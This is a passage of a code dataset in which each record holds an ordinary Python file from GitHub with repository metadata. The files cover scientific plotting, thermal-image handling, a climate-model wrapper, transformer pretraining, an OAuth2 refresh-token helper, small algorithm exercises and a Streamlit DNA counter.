3), numpy.uint8)\n cv2.imwrite(destination_dir + '\\\\blank.png', blank_image)\n\n\n# def load_thermal_file(h5filename, date):\n# try:\n# filename = 'Z:\\\\Thermal\\\\' + date + '\\\\' + h5filename\n# file = h5py.File(filename, 'r')\n# data = file['FRAMES']\n# timestamps = file['Timestamps_ms']\n# except FileNotFoundError:\n# data = []\n# timestamps = []\n#\n# return data, timestamps\n\n\ndef load_thermal_file(_filename, _folder):\n try:\n filepath = _folder + '\\\\' + _filename\n file = h5py.File(filepath, 'r')\n data = file['FRAMES']\n timestamps = 
file['Timestamps_ms']\n except FileNotFoundError:\n data = []\n timestamps = []\n\n return data, timestamps\n\n\ndef write_frames_to_files(dataset, filename: str = 'ThermalImg_',\n destination_dir: str = 'E:\\\\GitHub\\\\CovPySourceFile\\\\ThermalImages\\\\'):\n\n n_frames, height, width, total_time_ms = [dataset.attrs[i] for i in list(dataset.attrs)]\n\n for n in range(0, n_frames):\n frame = dataset[n, 0:height, :]\n raw_img = cv2.normalize(frame, None, alpha=0, beta=255, norm_type=cv2.NORM_MINMAX, dtype=cv2.CV_8U)\n disp_img = cv2.applyColorMap(raw_img, cv2.COLORMAP_HOT)\n cv2.imwrite(destination_dir + filename + '{}.png'.format(n), disp_img)\n\n\ndef images_to_video(image_dir: str = 'E:\\\\GitHub\\\\CovPySourceFile\\\\ThermalImages\\\\',\n target_dir: str = 'E:\\\\GitHub\\\\CovPySourceFile\\\\Video\\\\',\n image_name_tag: str = 'ThermalImg',\n video_name: str = 'ThermalVideo',\n file_type: str = '.png'):\n\n n_imgs = len([file for file in os.listdir(image_dir) if file.endswith(file_type)])\n img_array = []\n for n in range(0, n_imgs):\n img_name = image_dir + image_name_tag + '_{}'.format(n) + file_type\n img = cv2.imread(img_name)\n height, width, layers = img.shape\n size = (width, height)\n img_array.append(img)\n\n out = cv2.VideoWriter(target_dir + video_name + '.avi', cv2.VideoWriter_fourcc(*'DIVX'), fps=30, frameSize=size)\n\n for i in range(len(img_array)):\n out.write(img_array[i])\n out.release()\n\n\ndef load_frame_from_dataset(dataset, frame_height, frame_width, frame_number):\n return dataset[frame_number, 0:frame_height, 0:frame_width]\n\n\ndef load_sub_frame(dataset, y_range: tuple, x_range: tuple, frame_number):\n return dataset[frame_number, y_range[0]:y_range[1]+1, x_range[0]:x_range[1]+1]\n\n\n","repo_name":"meistalampe/rPPG","sub_path":"CovPy/hdf5_helper_functions.py","file_name":"hdf5_helper_functions.py","file_ext":"py","file_size_in_byte":3373,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"11635115455","text":"import math\nimport numpy as np\nimport matplotlib\nmatplotlib.use('TkAgg')\nimport matplotlib.pyplot as plt\n\nA, B = 1, 100\nEPSILON = 1e-2\nALPHA = 1e-5\n\ndef func(x1, x2, a=A, b=B):\n return (a-x1)**2 + b*(x2-x1**2)**2\n\nif __name__ == '__main__':\n x, y = np.meshgrid(np.linspace(-5, 5, 1000),\n np.linspace(-5, 5, 1000))\n plt.contourf(x, y, func(x, y), locator=matplotlib.ticker.LogLocator(), cmap='gnuplot')\n plt.colorbar()\n plt.xlabel('$x_1$')\n plt.ylabel('$x_2$')\n plt.title(\"Rosenbrock Potential\")\n plt.savefig(\"contour.png\")","repo_name":"calzonelover/Inverse_Theory","sub_path":"HW03/pb2/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":564,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"70100505207","text":"\"\"\"\n.. _rotate_example:\n\nRotations\n~~~~~~~~~\n\nRotations of a mesh about its axes. In this model, the x axis is from the left\nto right; the y axis is from bottom to top; and the z axis emerges from the\nimage. The camera location is the same in all four images.\n\n\"\"\"\n# sphinx_gallery_thumbnail_number = 3\nimport pyvista as pv\nfrom pyvista import examples\n\n###############################################################################\n# Define camera and axes\n# ++++++++++++++++++++++\n#\n# Define camera and axes. 
Setting axes origin to ``(3.0, 3.0, 3.0)``.\n\nmesh = examples.download_cow()\nmesh.points /= 1.5 # scale the mesh\n\ncamera = pv.Camera()\ncamera.position = (30.0, 30.0, 30.0)\ncamera.focal_point = (5.0, 5.0, 5.0)\n\naxes = pv.Axes(show_actor=True, actor_scale=2.0, line_width=5)\naxes.origin = (3.0, 3.0, 3.0)\n\n###############################################################################\n# Original Mesh\n# +++++++++++++\n#\n# Plot original mesh. Add axes actor to Plotter.\n\np = pv.Plotter()\n\np.add_text(\"Mesh\", font_size=24)\np.add_actor(axes.actor)\np.camera = camera\np.add_mesh(mesh)\n\np.show()\n\n###############################################################################\n# Rotation about the x axis\n# +++++++++++++++++++++++++\n#\n# Plot the mesh rotated about the x axis every 60 degrees.\n# Add the axes actor to the Plotter and set the axes origin to the point of rotation.\n\np = pv.Plotter()\n\np.add_text(\"X-Axis Rotation\", font_size=24)\np.add_actor(axes.actor)\np.camera = camera\n\nfor i in range(6):\n rot = mesh.rotate_x(60 * i, point=axes.origin, inplace=False)\n p.add_mesh(rot)\n\np.show()\n\n###############################################################################\n# Rotation about the y axis\n# +++++++++++++++++++++++++\n#\n# Plot the mesh rotated about the y axis every 60 degrees.\n# Add the axes actor to the Plotter and set the axes origin to the point of rotation.\n\np = pv.Plotter()\n\np.add_text(\"Y-Axis Rotation\", font_size=24)\np.camera = camera\np.add_actor(axes.actor)\n\nfor i in range(6):\n rot = mesh.rotate_y(60 * i, point=axes.origin, inplace=False)\n p.add_mesh(rot)\n\np.show()\n\n###############################################################################\n# Rotation about the z axis\n# +++++++++++++++++++++++++\n#\n# Plot the mesh rotated about the z axis every 60 degrees.\n# Add axes actor to the Plotter and set the axes origin to the point of rotation.\n\np = pv.Plotter()\n\np.add_text(\"Z-Axis Rotation\", font_size=24)\np.camera = camera\np.add_actor(axes.actor)\n\nfor i in range(6):\n rot = mesh.rotate_z(60 * i, point=axes.origin, inplace=False)\n p.add_mesh(rot)\n\np.show()\n\n###############################################################################\n# Rotation about a custom vector\n# ++++++++++++++++++++++++++++++\n#\n# Plot the mesh rotated about a custom vector every 60 degrees.\n# Add the axes actor to the Plotter and set axes origin to the point of rotation.\n\np = pv.Plotter()\n\np.add_text(\"Custom Vector Rotation\", font_size=24)\np.camera = camera\np.add_actor(axes.actor)\nfor i in range(6):\n rot = mesh.copy()\n rot.rotate_vector(vector=(1, 1, 1), angle=60 * i, point=axes.origin)\n p.add_mesh(rot)\n\np.show()\n","repo_name":"pyvista/pyvista","sub_path":"examples/01-filter/rotate.py","file_name":"rotate.py","file_ext":"py","file_size_in_byte":3162,"program_lang":"python","lang":"en","doc_type":"code","stars":2055,"dataset":"github-code","pt":"76"} +{"seq_id":"23907586781","text":"\"\"\"\nCICEROSCM_WRAPPER for parallelisation\n\"\"\"\nimport logging\nimport os\nimport re\nimport shutil\nimport subprocess # nosec # have to use subprocess\nimport tempfile\nfrom distutils import dir_util\n\nimport numpy as np\nimport pandas as pd\nfrom scmdata import ScmRun, run_append\n\nfrom ...settings import config\nfrom ..utils.cicero_utils._utils import _get_unique_index_values\nfrom ._utils import _get_executable\nfrom .make_scenario_files import SCENARIOFILEWRITER\nfrom .read_results import CSCMREADER\nfrom 
.write_parameter_files import PARAMETERFILEWRITER\n\nLOGGER = logging.getLogger(__name__)\n\n\ndef get_endyear(scenariodata):\n \"\"\"\n Get end year from scenariodata\n \"\"\"\n scenarioframe = scenariodata.reset_index(\n (\"model\", \"region\", \"scenario\", \"unit\"), drop=True\n )\n years = scenarioframe.columns\n if isinstance(years[0], pd.Timestamp):\n endyear = int(years[-1].year)\n else:\n endyear = int(years[-1])\n return endyear\n\n\nclass CiceroSCMWrapper: # pylint: disable=too-few-public-methods\n \"\"\"\n CICEROSCM Wrapper for parallel runs\n \"\"\"\n\n def __init__(self, scenariodata):\n \"\"\"\n Initialise CICEROSCM wrapper\n \"\"\"\n udir = os.path.join(os.path.dirname(__file__), \"utils_templates\")\n self.sfilewriter = SCENARIOFILEWRITER(udir)\n self.pamfilewriter = PARAMETERFILEWRITER(udir)\n self._setup_tempdirs()\n self.resultsreader = CSCMREADER(self.rundir, get_endyear(scenariodata))\n\n self.scen = _get_unique_index_values(scenariodata, \"scenario\")\n self.model = _get_unique_index_values(scenariodata, \"model\")\n self.local_scenarioname = self.get_usable_scenario_name()\n self._make_dir_structure(self.local_scenarioname)\n self._call_sfilewriter(scenariodata)\n\n def get_usable_scenario_name(self):\n \"\"\"\n Cut the scenario name and get rid of special characters so run can work\n \"\"\"\n pam_min = os.path.join(self.rundir, \"1\", \"inputfiles\", \"pam_current.scm\")\n executable = _get_executable(self.rundir)\n call_string = f\"{executable} {pam_min}\"\n max_length_1 = 255 - len(call_string) - 60\n max_length_2 = int(\n np.floor(\n (127 - len(os.path.join(\"./\", \"12345\", \"inputfiles\", \"12345_conc.txt\")))\n / 2.0\n )\n )\n max_length = int(np.amin([max_length_1, max_length_2]))\n if max_length < 0:\n max_length = 1\n return re.sub(\"[^a-zA-Z0-9_-]\", \"\", self.scen)[:max_length]\n\n def _call_sfilewriter(self, scenarios):\n \"\"\"\n Call sfilewriter to write the scenariodata file\n \"\"\"\n self.sfilewriter.write_scenario_data(\n scenarios,\n os.path.join(self.rundir, self.local_scenarioname),\n self.local_scenarioname,\n )\n\n def run_over_cfgs(self, cfgs, output_variables):\n \"\"\"\n Run over each configuration parameter set\n write parameterfiles, run, read results\n and make an ScmRun with results\n \"\"\"\n runs = []\n for i, pamset in enumerate(cfgs):\n self.pamfilewriter.write_parameterfile(\n pamset,\n os.path.join(self.rundir, self.local_scenarioname),\n )\n executable = _get_executable(self.rundir)\n pamfile = os.path.join(\n self.rundir,\n self.local_scenarioname,\n \"inputfiles\",\n \"pam_current.scm\",\n )\n call = f\"{executable} {pamfile}\"\n\n LOGGER.debug(\"Call, %s\", call)\n subprocess.check_call(\n call,\n cwd=self.rundir,\n shell=True, # nosec # have to use subprocess\n )\n for variable in output_variables:\n (\n years,\n timeseries,\n unit,\n ) = self.resultsreader.read_variable_timeseries(\n self.local_scenarioname,\n variable,\n self.sfilewriter,\n )\n if years.empty: # pragma: no cover\n continue # pragma: no cover\n\n runs.append(\n ScmRun(\n pd.Series(timeseries, index=years),\n columns={\n \"climate_model\": \"CICERO-SCM\",\n \"model\": self.model,\n \"run_id\": pamset.get(\"Index\", i),\n \"scenario\": self.scen,\n \"region\": [\"World\"],\n \"variable\": [variable],\n \"unit\": [unit],\n },\n )\n )\n\n return run_append(runs)\n\n def _setup_tempdirs(self):\n \"\"\"\n Set up temporary directories to run and make output in\n \"\"\"\n root_dir = config.get(\"CICEROSCM_WORKER_ROOT_DIR\", None)\n self.rundir = 
tempfile.mkdtemp(prefix=\"ciceroscm-\", dir=root_dir)\n LOGGER.info(\"Creating new CICERO-SCM instance: %s\", self.rundir)\n dir_util.copy_tree(\n os.path.join(os.path.dirname(__file__), \"utils_templates\", \"run_dir\"),\n self.rundir,\n )\n\n def cleanup_tempdirs(self):\n \"\"\"\n Remove tempdirs after run\n \"\"\"\n LOGGER.info(\"Removing CICERO-SCM instance: %s\", self.rundir)\n shutil.rmtree(self.rundir)\n\n def _make_dir_structure(self, scenario):\n \"\"\"\n Make directory structure for a scenario in which to put input and\n outputfiles for the run\n \"\"\"\n os.makedirs(self.rundir, exist_ok=True)\n os.makedirs(os.path.join(self.rundir, scenario), exist_ok=True)\n os.makedirs(os.path.join(self.rundir, scenario, \"inputfiles\"), exist_ok=True)\n os.makedirs(os.path.join(self.rundir, scenario, \"outputfiles\"), exist_ok=True)\n","repo_name":"openscm/openscm-runner","sub_path":"src/openscm_runner/adapters/ciceroscm_adapter/ciceroscm_wrapper.py","file_name":"ciceroscm_wrapper.py","file_ext":"py","file_size_in_byte":5965,"program_lang":"python","lang":"en","doc_type":"code","stars":9,"dataset":"github-code","pt":"76"} +{"seq_id":"18166392414","text":"OFFSET = 100\nMAX_R = 200\n\n# 색종이 갯수\nn = int(input())\n\n# n개의 색종이 좌측하단 꼭짓점 입력\nrects = [\n tuple(map(int, input().split()))\n for _ in range(n)\n]\n\n# 2차원 좌표평면 선언\nchecked = [\n [0] * (MAX_R + 1)\n for _ in range(MAX_R + 1)\n]\n\nfor x, y in rects:\n # OFFSET 더하기\n x, y = x + OFFSET, y + OFFSET\n\n # 직사각형 칠하기\n for i in range(x, x+8):\n for j in range(y, y+8):\n checked[i][j] += 1\n\n# 모든 정사각형 색종이의 총 넓이\narea = 0\nfor row in checked:\n for elem in row:\n if elem >= 1:\n area += 1\n\nprint(area)","repo_name":"sujinjwa/algorithm","sub_path":"brute-force/FindTotalAreaofSquares.py","file_name":"FindTotalAreaofSquares.py","file_ext":"py","file_size_in_byte":632,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"7047651390","text":"import pandas as pd\nimport plotly.graph_objects as go\n\n# Load the CSV file\ndf = pd.read_csv('/content/combined_data_CSIsumed.csv')\n\n# Create the 3D heatmap\nfig = go.Figure(data=go.Scatter3d(\n x=df['x_loc'],\n y=df['y_loc'],\n z=df['z_loc'],\n mode='markers',\n marker=dict(\n size=3,\n color=df['csi_phase_rad'],\n colorscale='Viridis',\n opacity=0.8\n )\n))\n\n# Set axis labels\nfig.update_layout(scene=dict(\n xaxis_title='X',\n yaxis_title='Y',\n zaxis_title='Z'\n))\n\n# Set the layout and display the figure\nfig.show()\n","repo_name":"Hongyi-Sam-Dong/Wireless-Visualization","sub_path":"BedRoom Plotly Heatmap Visulization.py","file_name":"BedRoom Plotly Heatmap Visulization.py","file_ext":"py","file_size_in_byte":561,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"4993804041","text":"# -*- coding: UTF-8 -*-\nimport argparse\nimport math\nimport random\nimport time\nfrom MyDataSet_smiles import MyDataSet\nfrom torch.nn.utils.rnn import pad_sequence\nimport torch\nfrom torch.utils.data import DataLoader as DL\nimport torch.optim as optim\nfrom torch import nn\nfrom tqdm import tqdm\nfrom sklearn.manifold import TSNE\nimport os\nos.environ['CUDA_VISIBLE_DEVICES']= '0,1'\nimport globalvar as gl\n# os.environ['CUDA_VISIBLE_DEVICES']= '1'\ngl._init()\nif torch.cuda.is_available():\n device = torch.device('cuda')\n gl.set_value('cuda', device)\n print('The code uses GPU...')\nelse:\n device = torch.device('cpu')\n gl.set_value('cuda', device)\n print('The code uses CPU!!!')\n\n# from 
transformer import Transformer\nfrom transformer_smiles import Transformer\nfrom transformer_smiles import Encoder\nfrom utils_pretrain import *\nfrom model_pretrain import Net\nfrom nt_xent import NT_Xent\nfrom encoder_gnn import GCNet\nimport matplotlib.pyplot as plt\nimport scipy.stats as stats\nfrom sklearn.metrics import mean_squared_error, r2_score\nplt.switch_backend('agg')\n\"\"\"\nModel pre-training\n\n\"\"\"\n\n# train for one epoch to learn unique features\ndef train(net, data_loader, train_optimizer, vocab_dict):\n net.train()\n total_loss, total_num, train_bar = 0.0, 0, tqdm(data_loader)\n feature_graph = torch.Tensor()\n feature_org = torch.Tensor()\n top_3_tokens = []\n for tem in train_bar:\n graph1, out_1, org2, out_2,attn_score = net(tem.to(device))\n top_3_tokens.extend(calculate(tem,attn_score))\n feature_graph = torch.cat((feature_graph, torch.Tensor(graph1.to('cpu').data.numpy())), 0)\n feature_org = torch.cat((feature_org, torch.Tensor(org2.to('cpu').data.numpy())), 0)\n criterion = NT_Xent(out_1.shape[0], temperature, 1)\n loss = criterion(out_1, out_2)\n total_num += len(tem)\n total_loss += loss.item() * len(tem)\n train_bar.set_description('Train Epoch: [{}/{}] Loss: {:.8f}'.format(epoch, epochs, total_loss / total_num))\n\n train_optimizer.zero_grad()\n loss.backward()\n train_optimizer.step()\n # break\n return total_loss / total_num, feature_graph, feature_org, attn_score,top_3_tokens\n\ndef calculate(inputs,attn_score):\n \"\"\"\n Find the three tokens with the highest attention scores\n 1. Get the top three attention scores and their indices\n 2. Use the indices to locate the token ids at those input positions\n 3. Map the ids back to characters\n \"\"\"\n # print(inputs.shape,len(attn_score),attn_score[0].shape)\n attn_score = torch.tensor(attn_score[0])\n scores, indexs = torch.sort(attn_score,descending=True)\n top_3_token = []\n for i in range(indexs.shape[0]):\n ids = inputs[i,indexs[i,:3]]\n # print(ids)\n top_3_token.append(ids.cpu().numpy().tolist())\n return top_3_token\ndef get_dict(datafile):\n\n # SMILES dictionary: count how often every SMILES character occurs and rank from high to low (1-43)\n src_dict = {}\n with open(\"data/pretrain/data/\" + datafile + \"_dict.txt\", 'r') as f:\n for line in f.readlines():\n line = line.strip()\n k = line.split(' ')[0]\n v = line.split(' ')[1]\n src_dict[k] = int(v)\n f.close()\n sort_dict = {key: rank for rank, key in enumerate(sorted(src_dict.values(), reverse=True), 1)}\n vocab_dict = {k: sort_dict[v] for k, v in src_dict.items()}\n\n vocab_dict[''] = 0\n return vocab_dict\n\ndef compute_rsquared(X, Y):\n xBar = np.mean(X)\n yBar = np.mean(Y)\n SSR = 0\n varX = 0\n varY = 0\n for i in range(0, len(X)):\n diffXXBar = X[i] - xBar\n diffYYBar = Y[i] - yBar\n SSR += (diffXXBar * diffYYBar)\n varX += diffXXBar ** 2\n varY += diffYYBar ** 2\n\n SST = math.sqrt(varX * varY)\n r2=round((SSR / SST) ** 2,3)\n return r2\n\nif __name__ == '__main__':\n parser = argparse.ArgumentParser(description='Train ATMTCR')\n parser.add_argument('--datafile', default='data', help='original data for input in-vitro tryout now')\n parser.add_argument('--path', default='pretrain', help='original data for input')\n parser.add_argument('--feature_dim', default=32, type=int, help='Feature dim for latent vector')\n parser.add_argument('--temperature', default=0.1, type=float, help='Temperature used in softmax')\n parser.add_argument('--k', default=200, type=int, help='Top k most similar images used to predict the label')\n parser.add_argument('--batch_size', default=1024, type=int, help='Number of images in each mini-batch')\n parser.add_argument('--epochs', default=50, type=int, help='Number of sweeps over the dataset to 
train')\n parser.add_argument('--downtask', default='model_downstream.py', help='Script for the downstream task')\n # d_ff, d_k, d_v, n_heads = 64, 64, 64, 2\n\n # best batch_size so far: 1024\n d_ff, d_k, d_v, n_heads = 128, 128, 128, 2\n n_layers = 2\n precet = 0.25\n dropout = 0.2\n\n\n # args parse\n args = parser.parse_args()\n print(args)\n feature_dim, temperature, k, datafile = args.feature_dim, args.temperature, args.k, args.datafile\n\n batch_size, epochs = args.batch_size, args.epochs\n\n train_datas = []\n # data prepare\n train_data = TestbedDataset(root=args.path, dataset=args.datafile)\n\n\n vocab_dict = get_dict(datafile)\n vl = len(vocab_dict)\n PAD_IDX = vocab_dict.get('')\n # encoder drug_smiles\n smile_seqs = []\n # convert a batch of SMILES strings into torch tensors\n for smile in train_data:\n smile_seq = [int(vocab_dict.get(i)) for i in smile]\n\n tgt = torch.LongTensor(smile_seq)\n # tgt = torch.cat([torch.tensor([self.BOS_IDX]), torch.LongTensor(smile_seq), torch.tensor([self.EOS_IDX])], dim=0)\n\n # smile_seq[random.randint(0, len(smile) - 1)] = 0\n smile_seqs.append(torch.LongTensor(smile_seq))\n\n # pad all sequences to the same length\n src_seq = pad_sequence(smile_seqs, batch_first=True, padding_value=PAD_IDX)\n src_seq_len = src_seq.shape[1] # sequence length\n train_data = MyDataSet(src_seq)\n\n\n # model setup and optimizer config\n\n\n # encoder\n # model_encoder1 = GCNet().cuda()\n coder = Encoder(src_vocab_size=vl, d_model=feature_dim, d_ff=d_ff, d_k=d_k, d_v=d_v, n_heads=n_heads, n_layers=n_layers).to(device)\n model = Transformer(src_vocab_size=vl, tgt_vocab_size=None, d_model=feature_dim, d_ff=d_ff, d_k=d_k, d_v=d_v, n_heads=n_heads, n_layers=n_layers, precet=precet, seq_len=src_seq_len, dropout=dropout, trans_encoder=coder).cuda()\n if torch.cuda.device_count() > 1:\n print(\"Let's use\", torch.cuda.device_count(), \"GPUs!\")\n model = nn.DataParallel(model, device_ids=[0, 1]) # use 2 GPUs here\n\n model.to(device)\n from collections import Counter\n optimizer = optim.Adam(model.parameters(), lr=0.0001, weight_decay=1e-7)\n # training loop\n results = {'train_loss': [], 'test_acc@1': [], 'test_acc@5': []}\n save_name_pre = '{}_{}_{}'.format(batch_size, epochs,datafile)\n if not os.path.exists('results/'+save_name_pre):\n os.mkdir('results/'+save_name_pre)\n tsne = TSNE()\n AUCs = ('Epoch\\tloss\\tr2\\ttime')\n for epoch in range(1, epochs + 1):\n start = time.time()\n # train_loader = DL(train_data, batch_size=batch_size, shuffle=True)\n train_loader = DL(train_data, batch_size=batch_size, shuffle=False)\n train_loss, features, org, attn_score,top_3_tokens = train(model, train_loader, optimizer, vocab_dict)\n # take the most frequent tokens\n top_3_tokens = [j for i in top_3_tokens for j in i]\n counts = {k:top_3_tokens.count(v) for k,v in vocab_dict.items()}\n counts = sorted(counts.items(),key=lambda x:x[1],reverse=True)\n with open(f\"counts/count_{epoch}_feq.json\",'w',encoding='utf8') as f:\n import json\n json.dump(counts,f,ensure_ascii=False,indent=2)\n # print(counts)\n # exit(0)\n torch.save(model.state_dict(), 'results/model_transformer_state_dict.pkl')\n torch.save(model, 'results/model_transformer.pkl')\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n","repo_name":"hliulab/atmtcr","sub_path":"TCR-encoder/main_train.py","file_name":"main_train.py","file_ext":"py","file_size_in_byte":8033,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"76"} +{"seq_id":"18986046238","text":"#!/usr/bin/env python3\n# -*- coding: utf-8, vim: expandtab:ts=4 -*-\n\nimport os\nfrom urllib.parse import parse_qs\nfrom 
argparse import ArgumentParser\nfrom configparser import ConfigParser\nfrom wsgiref.simple_server import make_server\n\nfrom requests_oauthlib import OAuth2Session\n\n\ndef authorize_app_for_token(client_id, client_secret, redirect_uri, authorization_base_url, token_url, scope):\n session = OAuth2Session(client_id, scope=scope, redirect_uri=redirect_uri)\n\n # Redirect user to Google for authorization\n authorization_url, state = session.authorization_url(authorization_base_url,\n # offline for refresh token\n # force to always make user click authorize\n access_type='offline', prompt='select_account')\n\n print('Please go here and authorize:', authorization_url)\n\n if redirect_uri == 'http://localhost':\n # Hack to piggyback the code out of the HTTP server\n piggyback = []\n def oauth2_redirect_url_handler(environ, start_response):\n status = '200 OK'\n headers = [('Content-type', 'text/plain; charset=utf-8')]\n\n returned_code = parse_qs(environ['QUERY_STRING'])['code'][0]\n piggyback.append(returned_code)\n\n start_response(status, headers)\n\n return [f'code: {returned_code}\\n'.encode('UTF-8')]\n\n try:\n with make_server('', 80, oauth2_redirect_url_handler) as httpd:\n print('Serving HTTP on port 80...')\n # Serve one request, then exit\n httpd.handle_request()\n code = piggyback[0]\n except PermissionError:\n # INFO https://stackoverflow.com/questions/413807/is-there-a-way-for-non-root-processes-to-bind-to-privileged-ports-on-linux/27989419#27989419\n print('Cannot bind to port 80!\\n\\nUse\\n'\n 'sudo setcap \\'cap_net_bind_service=+ep\\' /usr/bin/python3.10\\n'\n 'command to allow Python to bind\\n'\n '(Revoke the right with\\n'\n 'sudo setcap \\'cap_net_bind_service=-ep\\' /usr/bin/python3.10\\n'\n ') or setup authbind:\\n'\n '1. sudo touch /etc/authbind/byport/80\\n'\n '2. 
sudo chmod o+x /etc/authbind/byport/80\\n'\n 'Run this program: authbind ./venv/bin/python [THIS_FILE] [PARAMS]')\n exit(1)\n else:\n # Get the authorization verifier code from the callback URL\n code = input('Paste the authorization code: ')\n print() # New line after the input line for the next print\n\n # Fetch the token\n os.environ['OAUTHLIB_RELAX_TOKEN_SCOPE'] = '1'\n session.fetch_token(token_url, client_secret=client_secret, code=code)\n\n return session.token['access_token'], session.token['refresh_token']\n\n\ndef parse_args():\n parser = ArgumentParser(description='Get OAuth2 token by authorizing the app')\n # Credentials you get from registering a new application\n parser.add_argument('-c', '--client-id', dest='client_id', help='Client ID', metavar='CLIENT_ID',\n required=True)\n parser.add_argument('-s', '--client-secret', dest='client_secret', help='Client secret', metavar='CLIENT_SECRET',\n required=True)\n # To get a code instead of redirecting\n parser.add_argument('-r', '--redirect-uri', dest='redirect_uri',\n help='Redirect URI (default: http://localhost) use \\'oob\\' or other URL to get code'\n ' instead of redirecting (if supported)!',\n metavar='REDIRECT_URI', default='http://localhost')\n # OAuth endpoints (given in the Google API documentation)\n parser.add_argument('-b', '--base-url', dest='authorization_base_url',\n help='Authorization base URL (default: https://accounts.google.com/o/oauth2/v2/auth)',\n metavar='BASE_URL', default='https://accounts.google.com/o/oauth2/v2/auth')\n parser.add_argument('-t', '--token-url', dest='token_url',\n help='Token URL (default: https://www.googleapis.com/oauth2/v4/token)',\n metavar='TOKEN_URL', default='https://www.googleapis.com/oauth2/v4/token')\n # Scope for IMAP access\n parser.add_argument('--scope', dest='scope', nargs='+', default=['https://mail.google.com/'],\n help='Scope (default: https://mail.google.com/)', metavar='SCOPE')\n # Write refresh token to INI file\n parser.add_argument('-f', '--auth-file', dest='auth_file',\n help='The file containing the configurations (default: auth.ini)',\n metavar='FILENAME', default='auth.ini')\n parser.add_argument('-i', '--section', dest='section',\n help='The section of the config file to use (default: TO)',\n metavar='SECTION', default='TO')\n\n return parser.parse_args()\n\n\ndef print_and_save_token(access_token, refresh_token, auth_file, section):\n auth_config = ConfigParser()\n auth_config.read(auth_file, encoding='UTF-8')\n auth_config[section]['refresh_token'] = refresh_token\n with open(auth_file, 'w', encoding='UTF-8') as configfile:\n auth_config.write(configfile)\n # Print the tokens\n print(f'Access token: {access_token}')\n print(f'Refresh token: {refresh_token}')\n print(f'Refresh token is written into: {auth_file} section {section}')\n\n\ndef main():\n args = parse_args()\n access_token, refresh_token = authorize_app_for_token(args.client_id, args.client_secret, args.redirect_uri,\n args.authorization_base_url, args.token_url, args.scope)\n print_and_save_token(access_token, refresh_token, args.auth_file, args.section)\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"dlazesz/syncimap","sub_path":"get_oauth2_token.py","file_name":"get_oauth2_token.py","file_ext":"py","file_size_in_byte":5979,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"33275474120","text":"def is_VPS(A):\n stack = []\n for i in range(len(A)):\n if A[i] == \"(\":\n stack.append(A[i])\n else:\n if len(stack)==0:\n return 
False\n else:\n stack.pop()\n continue\n #print(stack)\n if len(stack)!=0:\n return False\n return True\n\nn = int(input())\nresult = []\nfor i in range(n):\n temp = input()\n result.append(temp)\n\nfor i in result:\n if is_VPS(i):\n print(\"YES\")\n else:\n print(\"NO\")","repo_name":"jyojun/algorithm","sub_path":"baekjoon/class2/괄호.py","file_name":"괄호.py","file_ext":"py","file_size_in_byte":516,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"28614866129","text":"import pandas as pd\nimport streamlit as st\nimport altair as alt\n\ndict={}\nnucleo_list={'A','T','G','C'}\nst.write('# DNA nucleotide count App')\nst.write('***')\n\n#read input DNA from the web app\nread_input=st.text_area(\"Input DNA sequence\",height=250)\n\n#replace line feeds,carriage returns and spaces and convert to upper\ncleansed_input=read_input.replace('\\n','').replace('\\r','').replace(' ','').upper()\n\n#check if DNA sequence entered is valid\nif cleansed_input and not(set(cleansed_input).issubset(nucleo_list)):\n st.error(\"DNA sequence needs to be a sequence of A,T,G,C \")\nelse:\n #create a dictionary with the nucleotide counts\n for letter in cleansed_input:\n dict[letter]=dict.setdefault(letter,0)+1\n\nst.write(pd.DataFrame([dict]))\ndf=pd.DataFrame.from_dict(dict,orient='index')\nst.write(df)\ndf.reset_index(inplace=True)\ndf=df.rename(columns={'index':'nucleotide',0:'count'})\nst.write(\"df is :\",df)\n\n#create a chart\n\nst.subheader('Bar Chart')\np=alt.Chart(df).mark_bar().encode(x='nucleotide:O', y='count:Q').properties(width=alt.Step(100))\nst.write(p)","repo_name":"agvar/Python-data-apps","sub_path":"dna_count/dna_count.py","file_name":"dna_count.py","file_ext":"py","file_size_in_byte":1070,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"74635496566","text":"import os, cv2\nimport numpy as np\n\ndef get_video_frames(videofile):\n assert os.path.exists(videofile), \"File does not exist: %s\"%(videofile)\n # get the video data\n cap = cv2.VideoCapture(videofile)\n ret, frame = cap.read()\n video_data = []\n while (ret):\n video_data.append(frame)\n ret, frame = cap.read()\n \n return video_data\n\ndef read_coord_arrays(coord_file):\n \"\"\" Read coordinate array\n \"\"\"\n assert os.path.exists(coord_file), \"File does not exist: %s\"%(coord_file)\n coord_data = []\n with open(coord_file, 'r') as f:\n for line in f.readlines():\n x_coord = int(line.strip().split(',')[0])\n y_coord = int(line.strip().split(',')[1])\n coord_data.append([x_coord, y_coord])\n coord_data = np.array(coord_data, dtype=np.int32)\n return coord_data\n\ndef read_mapping(map_file):\n map_dict = {'ID_data':[], 'ID_paper':[], 'participants':[], 'accident':[]}\n with open(map_file, 'r') as f:\n for line in f.readlines():\n strs = line.strip().split(',')\n map_dict['ID_data'].append(int(strs[0]))\n map_dict['ID_paper'].append(int(strs[1]))\n obj_list = strs[2:4]\n if 'self' in obj_list:\n obj_list.remove('self')\n map_dict['participants'].append(obj_list)\n map_dict['accident'].append(strs[4])\n return map_dict\n\nif __name__ == \"__main__\":\n\n root_path = './data/DADA-2000'\n fps = 30\n phase = 'testing'\n atype = '40' # '1', '16', '11', '34', '40'\n sequence = '080' # '022', '001', '097', '088', '080'\n barWidth = 60\n vis_video_file = './vis_data/vis_' + atype + '_' + sequence + '.avi'\n\n video_file = os.path.join(root_path, phase, 'rgb_videos', atype, sequence + '.avi')\n salmap_file = os.path.join(root_path, phase, 'salmap_videos', atype, sequence + '.avi')\n 
